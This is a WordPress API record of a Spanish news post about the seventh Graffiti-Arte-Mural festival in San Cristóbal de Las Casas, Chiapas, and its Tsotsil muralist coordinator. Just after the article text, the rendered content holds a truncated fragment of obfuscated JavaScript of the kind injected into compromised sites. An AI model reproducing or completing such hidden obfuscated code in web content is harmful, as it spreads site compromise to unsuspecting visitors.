{"id":7315,"date":"2022-12-15T01:13:53","date_gmt":"2022-12-15T01:13:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7315"},"modified":"2022-12-15T01:13:54","modified_gmt":"2022-12-15T01:13:54","slug":"inicia-septimo-festival-de-graffiti-arte-mural-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7315","title":{"rendered":"Inicia S\u00e9ptimo Festival de Graffiti-Arte-Mural en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"730\" height=\"500\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-14-at-16.52.59.jpeg\" alt=\"\" class=\"wp-image-7316\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-14-at-16.52.59.jpeg 730w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-14-at-16.52.59-300x205.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-14-at-16.52.59-110x75.jpeg 110w\" sizes=\"auto, (max-width: 730px) 100vw, 730px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<br>San Crist\u00f3bal de Las Casas.- El Colectivo Independiente &#8220;Ch&#8217;ulel&#8221; llevar\u00e1 a cabo durante 4 d\u00edas, el S\u00e9ptimo Festival de Graffiti-Arte-Mural, dio a saber su coordinador Dyg&#8217;nojoch, artista urbano maya-tsotsil, oriundo de Chenalh\u00f3 pero radicado desde hace a\u00f1os en esta ciudad.<br>Ante la problem\u00e1tica que hay en la Zona Norte de la ciudad, dijo que desean contribuir a su transformaci\u00f3n social, por lo que participar\u00e1n en el espect\u00e1culo artistas de talla nacional e internacional, adem\u00e1s de efectuarse varios eventos para fortalecer la reconstrucci\u00f3n del tejido social que padece la mencionada zona.<br>Dyg&#8217;nojoch, artista urbano que ilustra y dise\u00f1a las artes visuales con mensajes diversos entre la lucha espiritual y la contienda en pueblos originarios, fue muy preciso al decir que nunca el gobierno los ha apoyado de manera digna, por lo que no creen en sus programas y por eso llevan a cabo este tipo de festivales.<br>\u201cEs una s\u00e9ptima edici\u00f3n que hemos trabajado por varios a\u00f1os, hay exponentes invitados vienen a dejar y aportar un poco de su trabajo, todo esto derivado de la problem\u00e1tica de la Zona Norte, nuestra arma es el arte, queremos rescatar espacios p\u00fablicos, no toda la Zona es conflictiva, hay gente trabajadora y queremos dar a conocer todo eso\u201d.<br>Dyg\u2019nojoch es dise\u00f1ador gr\u00e1fico de profesi\u00f3n, pintor, muralista del graffiti, ha participado en festivales de murales en encuentros a nivel nacional y estatal, tambi\u00e9n ha colaborado en diversas acciones art\u00edsticas a nivel internacional. Ilustra, dise\u00f1a y practica las artes visuales en mensajes muy diversos, entre lo espiritual, la lucha de los pueblos originarios, los problemas en el planeta a causa de la explotaci\u00f3n de la naturaleza, personajes fantasiosos y formas org\u00e1nicas, seres como la flora y la fauna, complementados con la simbolog\u00eda maya de una manera alegre y colorida para no agredir los ojos que se prestan a verlos.<br>Su base son los relatos de la gente, su familia y el mismo pueblo, lo que vivi\u00f3 de ni\u00f1o. Ah\u00ed creo que es donde el discurso explica lo que dej\u00f3 hecho al concluir algo. Si eso no habla es que no expres\u00f3 nada. Co fundador del festival Gam:graffiti-arte-mural que se encarga de reunir a artistas del mural a nivel local, nacional e internacional, para el rescate de espacios p\u00fablicos en las periferias de San Crist\u00f3bal.<br>Ha tenido numerosas exposiciones individuales y participado en diversas colectivas fuera del pa\u00eds. Ha representado Chiapas como a M\u00e9xico y publicado en el libro: De mi barrio a tu barrio: Streetart in Mexico, Central America and the Caribbean.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- El Colectivo Independiente &#8220;Ch&#8217;ulel&#8221; llevar\u00e1 a cabo durante 4 d\u00edas, el S\u00e9ptimo Festival de Graffiti-Arte-Mural, dio a saber su coordinador Dyg&#8217;nojoch, artista urbano maya-tsotsil, oriundo de Chenalh\u00f3 pero radicado desde hace a\u00f1os en esta ciudad.Ante la problem\u00e1tica que hay en la Zona Norte de la ciudad, dijo que desean &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7316,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7315","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7315","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7315"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7315\/revisions"}],"predecessor-version":[{"id":7317,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7315\/revisions\/7317"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7316"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7315"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7315"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7315"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}